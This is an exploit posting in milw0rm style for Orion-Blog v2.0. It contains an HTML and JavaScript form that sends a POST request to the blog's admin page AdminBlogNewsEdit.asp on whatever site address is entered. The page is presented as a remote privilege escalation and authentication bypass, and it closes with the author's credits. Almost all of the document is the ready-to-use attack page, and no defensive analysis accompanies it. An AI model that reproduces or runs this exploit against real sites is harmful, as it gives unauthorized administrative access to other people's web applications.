Orion-Blog 2.0 (AdminBlogNewsEdit.asp) Remote Auth Bypass Vuln<!--

Orion-Blog v2.0 Version Remote Privilege Escalation Exploit

Type :

Privilege Escalation

Release Date :

{2007-03-14}

Product :

Orion-Blog

Bug :

http://localhost/script/admin/default.asp

Privilege Escalation Exploit :

-->

Orion-Blog v2.0 Version Remote Privilege Escalation Exploit
<body bgcolor=`#000000`>
<script language=`JavaScript`>
function ps() {
  {
    unique.action=``+document.unique.site.value+`/admin/AdminBlogNewsEdit.asp`;
    unique.submit();
  }
}
</script>
<table width=`500` border=`0` align=`center`>
<font face=`Verdana` size=`2` color=`#FF0000`><b>--- Orion-Blog v2.0 Version Remote Privilege Escalation Exploit ---</b></font>
<form name=`unique` method=`POST` onsubmit=`ps();`>
<center><font face=`Arial` size=`2` color=`#00FF00`>Site Address :</td></center><br>
<center><input type=`text` name=`site` value=`http://localhost/script` size=`44` class=`unique` class=`inputbox`></center><br>
<center><input type=`submit` value=`Apply` class=`unique`></center><br>
<center><font face=`Verdana` size=`2` color=`#FF0000`><b>UniquE-Key{UniquE-Cracker}</b></font>
<br>
<font face=`Verdana` size=`2` color=`#FF0000`><b>UniquE@UniquE-Key.ORG</b></font>
<br>
<font face=`Verdana` size=`2` color=`#FF0000`><b>http://UniquE-Key.ORG</b></font></center>

<!--

Tested :

Orion-Blog v2.0

Vulnerable :

Orion-Blog v2.0

Author :

UniquE-Key{UniquE-Cracker}
UniquE(at)UniquE-Key.Org
http://www.UniquE-Key.Org

-->

# milw0rm.com [2007-03-15]
